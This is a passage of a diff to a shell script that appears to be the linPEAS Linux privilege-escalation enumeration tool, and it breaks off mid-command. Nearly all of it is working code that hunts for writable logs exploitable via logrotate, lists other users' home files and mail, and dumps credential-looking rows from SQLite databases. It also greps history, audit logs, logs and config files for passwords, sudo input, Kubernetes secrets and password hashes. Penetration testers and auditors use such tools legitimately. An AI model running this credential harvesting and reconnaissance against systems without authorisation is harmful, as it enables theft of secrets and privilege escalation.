-logfind=$(find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100) -printf "%s\n" "$logfind" | while read log; do - if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found - if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; - elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case - elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; - elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; +if command -v logrotate >/dev/null && logrotate --version | head -n 1 | grep -Eq "[012]\.[0-9]+\.|3\.[0-9]\.|3\.1[0-7]\.|3\.18\.0"; then #3.18.0 and below +print_2title "Writable log files (logrotten) (limit 50)" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation" + logrotate --version 2>/dev/null || echo_not_found "logrotate" + lastWlogFolder="ImPOsSiBleeElastWlogFolder" + logfind=$(find $ROOT_FOLDER -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 50) + printf "%s\n" "$logfind" | while read log; do + if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found + if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; + elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case + elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; + elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; + fi fi + done +fi + +echo "" + +if ! [ "$SEARCH_IN_FOLDER" ]; then + ##-- IF) Files inside my home + print_2title "Files inside $HOME (limit 20)" + (ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found + echo "" + + ##-- IF) Files inside /home + print_2title "Files inside others home (limit 20)" + (find $HOMESEARCH -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found + echo "" + + ##-- IF) Mail applications + print_2title "Searching installed mail applications" + ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" | sort | uniq + echo "" + + ##-- IF) Mails + print_2title "Mails (limit 50)" + (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g") || echo_not_found + echo "" + + ##-- IF) Backup folders + if [ "$backup_folders" ] || [ "$DEBUG" ]; then + print_2title "Backup folders" + printf "%s\n" "$backup_folders" | while read b ; do + ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; + ls -l "$b" 2>/dev/null && echo "" + done + echo "" fi -done - -echo "" - -##-- IF) Files inside my home -print_2title "Files inside $HOME (limit 20)" -(ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found -echo "" - -##-- IF) Files inside /home -print_2title "Files inside others home (limit 20)" -(find $HOMESEARCH -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found -echo "" - -##-- IF) Mail applications -print_2title "Searching installed mail applications" -ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" -echo "" - -##-- IF) Mails -print_2title "Mails (limit 50)" -(find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_GREEN},g") || echo_not_found -echo "" - -##-- IF) Backup folders -print_2title "Backup folders" -printf "%s\n" "$backup_folders" | while read b ; do - ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; - ls -l "$b" 2>/dev/null && echo "" -done -echo "" +fi ##-- IF) Backup files print_2title "Backup files (limited 100)" -backs=$(find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) +backs=$(find $ROOT_FOLDER -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) printf "%s\n" "$backs" | head -n 100 | while read b ; do if [ -r "$b" ]; then ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; @@ -3927,14 +4713,16 @@ if [ "$MACPEAS" ]; then sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null fi -print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" -FILECMD="$(command -v file 2>/dev/null)" -if [ "$PSTORAGE_DATABASE" ]; then + + +if [ "$PSTORAGE_DATABASE" ] || [ "$DEBUG" ]; then + print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" + FILECMD="$(command -v file 2>/dev/null)" printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do if [ "$FILECMD" ]; then - echo "Found: $(file $f)" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + echo "Found "$(file "$f") | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; else - echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + echo "Found $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; fi done SQLITEPYTHON="" @@ -3968,8 +4756,8 @@ if [ "$PSTORAGE_DATABASE" ]; then printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head + echo "" fi - echo "" done fi fi @@ -3983,30 +4771,34 @@ if [ "$MACPEAS" ]; then fi ##-- IF) Web files -print_2title "Web files?(output limit)" -ls -alhR /var/www/ 2>/dev/null | head -ls -alhR /srv/www/htdocs/ 2>/dev/null | head -ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head -ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head -echo "" +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Web files?(output limit)" + ls -alhR /var/www/ 2>/dev/null | head + ls -alhR /srv/www/htdocs/ 2>/dev/null | head + ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head + ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head + echo "" +fi ##-- IF) All hidden files print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" -find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70 +find $ROOT_FOLDER -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70 echo "" ##-- IF) Readable files in /tmp, /var/tmp, bachups -print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" -filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70) -printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done -echo "" +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" + filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70) + printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done + echo "" +fi ##-- IF) Interesting writable files by ownership or all if ! [ "$IAMROOT" ]; then print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files" #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all - obmowbe=$(find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) + obmowbe=$(find $ROOT_FOLDER '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) printf "%s\n" "$obmowbe" | while read entry; do if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; elif echo "$entry" | grep -qE "$writeVB"; then @@ -4021,9 +4813,9 @@ fi ##-- IF) Interesting writable files by group if ! [ "$IAMROOT" ]; then print_2title "Interesting GROUP writable files (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files" for g in $(groups); do - iwfbg=$(find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) + iwfbg=$(find $ROOT_FOLDER '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) if [ "$iwfbg" ] || [ "$DEBUG" ]; then printf " Group $GREEN$g:\n$NC"; printf "%s\n" "$iwfbg" | while read entry; do @@ -4039,6 +4831,13 @@ if ! [ "$IAMROOT" ]; then echo "" fi +##-- IF) Passwords in history cmd +if [ "$(history 2>/dev/null)" ] || [ "$DEBUG" ]; then + print_2title "Searching passwords in history cmd" + history | grep -Ei "$pwd_inside_history" "$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED}," + echo "" +fi + ##-- IF) Passwords in history files if [ "$PSTORAGE_HISTORY" ] || [ "$DEBUG" ]; then print_2title "Searching passwords in history files" @@ -4061,10 +4860,12 @@ if [ "$PSTORAGE_PASSWORD_FILES" ] || [ "$DEBUG" ]; then fi ##-- IF) TTY passwords -print_2title "Checking for TTY (sudo/su) passwords in audit logs" -aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" -find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" -echo "" +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Checking for TTY (sudo/su) passwords in audit logs" + aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" + find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" + echo "" +fi ##-- IF) IPs inside logs if [ "$DEBUG" ]; then @@ -4074,9 +4875,11 @@ if [ "$DEBUG" ]; then fi ##-- IF) Passwords inside logs -print_2title "Searching passwords inside logs (limit 70)" -(find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," -echo "" +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Searching passwords inside logs (limit 70)" + (find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," + echo "" +fi if [ "$DEBUG" ]; then ##-- IF) Emails inside logs @@ -4091,7 +4894,11 @@ fi if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then ##-- IF) Find possible files with passwords print_2title "Searching passwords inside key folders (limit 70) - only PHP files" - intpwdfiles=$(timeout 150 find $HOMESEARCH /var/www/ /usr/local/www/ $backup_folders_row /tmp /etc /mnt /private -type f -exec grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null) + if ! [ "$SEARCH_IN_FOLDER" ]; then + intpwdfiles=$(timeout 150 find $HOMESEARCH /var/www/ /usr/local/www/ $backup_folders_row /tmp /etc /mnt /private -type f -exec grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null) + else + intpwdfiles=$(timeout 150 find $SEARCH_IN_FOLDER -type f -exec grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null) + fi printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" echo "" @@ -4101,14 +4908,22 @@ if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then ##-- IF) Find possible files with passwords print_2title "Searching possible password variables inside key folders (limit 140)" - timeout 150 find $HOMESEARCH -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & - timeout 150 find /var/www $backup_folders_row /tmp /etc /mnt /private grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & + if ! [ "$SEARCH_IN_FOLDER" ]; then + timeout 150 find $HOMESEARCH -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & + timeout 150 find /var/www $backup_folders_row /tmp /etc /mnt /private grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & + else + timeout 150 find $SEARCH_IN_FOLDER -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & + fi wait echo "" ##-- IF) Find possible conf files with passwords print_2title "Searching possible password in config files (if k8s secrets are found you need to read the file)" - ppicf=$(timeout 150 find $HOMESEARCH /var/www/ /usr/local/www/ /etc /opt /tmp /private /Applications /mnt -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) + if ! [ "$SEARCH_IN_FOLDER" ]; then + ppicf=$(timeout 150 find $HOMESEARCH /var/www/ /usr/local/www/ /etc /opt /tmp /private /Applications /mnt -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) + else + ppicf=$(timeout 150 find $SEARCH_IN_FOLDER -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) + fi printf "%s\n" "$ppicf" | while read f; do if grep -qEiI 'passwd.*|creden.*|^kind:\W?Secret|\Wenv:|\Wsecret:|\WsecretName:|^kind:\W?EncryptionConfiguration|\-\-encriyption\-provider\-config' \"$f\" 2>/dev/null; then echo "$ITALIC $f$NC" @@ -4116,550 +4931,725 @@ if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then fi done echo "" +fi - ##-- IF) Find possible regexes - print_2title "Searching Hashed Passwords" -print_3title "Searching Apr1 MD5 (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +fi +echo '' +echo '' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi + +if echo $CHECKS | grep -q api_keys_regex; then +print_title "API Keys Regex" + +if [ "$REGEXES" ] && [ "$TIMEOUT" ]; then + print_2title "Searching Hashed Passwords" +print_3title_no_nl "Searching Apr1 MD5 (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE 